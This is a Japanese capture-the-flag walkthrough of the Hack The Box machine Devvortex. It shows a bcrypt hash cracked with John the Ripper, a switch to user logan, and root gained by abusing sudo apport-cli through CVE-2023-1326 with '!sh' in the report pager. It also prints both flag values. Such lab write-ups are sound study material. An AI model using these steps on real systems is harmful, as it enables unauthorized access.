https://qiita.com/Perplex/items/67534c618692fc2456d6 john the ripperを使うらしい
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho (?)
1g 0:00:00:04 DONE (2024-05-09 23:41) 0.2475g/s 356.4p/s 356.4c/s 356.4C/s winston..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
wordlistを指定しないと、/usr/share/john/password.lstが使われるが、この中にtequieromuchoは存在しなかったので終わらない
手に入れたパスワードを使って、suコマンドでloganユーザに切り替わり、user.txtゲット
www-data@devvortex:~/dev.devvortex.htb/administrator$ su logan
Password:
logan@devvortex:~$ cat user.txt
6c6da8961f72024810914edff8cc0d4e
SSHログインでもOK
sudo -lをすると、apport-cliというのがroot権限で実行可能であることが分かった
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
apport-cliというのは、障害発生時にレポートを送信するためのものらしい https://valinux.hatenablog.com/entry/20210721
そもそも apport が何かと見ますと、インストールされたプログラムの障害発生時に情報を収集して自動的にレポートを送信する仕組みを提供するものでした。 主に Ubuntu の障害解析チームが解析の手掛かりにする為のもののようです。
logan@devvortex:/var/www/dev.devvortex.htb/administrator$ apport-cli --help
Usage: apport-cli [options] [symptom|pid|package|program path|.apport/.crash file]
Options:
-h, --help show this help message and exit
-f, --file-bug Start in bug filing mode. Requires --package and an
optional --pid, or just a --pid. If neither is given,
display a list of known symptoms. (Implied if a single
argument is given.)
-w, --window Click a window as a target for filing a problem
report.
-u UPDATE_REPORT, --update-bug=UPDATE_REPORT
Start in bug updating mode. Can take an optional
--package.
-s SYMPTOM, --symptom=SYMPTOM
File a bug report about a symptom. (Implied if symptom
name is given as only argument.)
-p PACKAGE, --package=PACKAGE
Specify package name in --file-bug mode. This is
optional if a --pid is specified. (Implied if package
name is given as only argument.)
-P PID, --pid=PID Specify a running program in --file-bug mode. If this
is specified, the bug report will contain more
information. (Implied if pid is given as only
argument.)
--hanging The provided pid is a hanging application.
-c PATH, --crash-file=PATH
Report the crash from given .apport or .crash file
instead of the pending ones in /var/crash. (Implied if
file is given as only argument.)
--save=PATH In bug filing mode, save the collected information
into a file instead of reporting it. This file can
then be reported later on from a different machine.
--tag=TAG Add an extra tag to the report. Can be specified
multiple times.
-v, --version Print the Apport version number.
logan@devvortex:/var/www/dev.devvortex.htb/administrator$ apport-cli --version
2.20.11
インストールされているバージョンは2.20.11
exploit-dbでapportで検索すると、https://www.exploit-db.com/exploits/43971 が出てきたがバージョンが当てはまらない
https://github.com/liumuqing/CVE-2021-3899_PoC は/etc/sudoersを編集する必要があるようだが、書き込み権限がないので出来ない
logan@devvortex:/var/www/dev.devvortex.htb/administrator$ ls -l /etc/sudoers
-r--r----- 1 root root 794 Sep 27 2023 /etc/sudoers
CVE-2023-1326を見つけた バージョン2.26.0以下が対象 https://scan.netsecurity.ne.jp/article/2024/02/14/50590.html
脆弱性は apport-cli の解析結果を閲覧する機能に存在します。脆弱性が含まれている apport-cli では、解析結果の閲覧時に OS コマンドを実行する文法を実装しているため、sudo コマンドなどで実行した際に bash などの実行を指示すれば管理者権限での対話的な操作が可能となります。apport-cli では sudo や pkexec を介して実行されて同様の動作が実行された場合に、呼び出し元の権限で実行するように実装を変更して、脆弱性に対策しています。
https://github.com/roaris/ctf-log/issues/37#issuecomment-2095737774 でやったCVE-2023-26604に似た脆弱性
https://valinux.hatenablog.com/entry/20210721
障害発生時、カレントディレクトリにはコアファイルが、/var/crash にはコアファイルを含む収集情報ファイル (以下レポート) が置かれます。
/var/crashにレポートがあった
logan@devvortex:/var/www/dev.devvortex.htb/administrator$ ls /var/crash
_usr_bin_apport-cli.1000.crash
sudo apport-cli -c /var/crash/_usr_bin_apport-cli.1000.crash を実行する
What would you like to do? Your options are:
S: Send report (36.2 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C):
と聞かれるので、Vを選択 しばらくすると、コマンド入力できる箇所が出てくるので、!shと入力すると以下のようにrootのシェルを取れる
# bash -i
root@devvortex:/var/www/dev.devvortex.htb/administrator# cd /root
root@devvortex:~# ls
root.txt
root@devvortex:~#
root@devvortex:~# cat root.txt
deb5faa894f0d9801842e81e3dad16ff
解き方まとめ
https://app.hackthebox.com/machines/Devvortex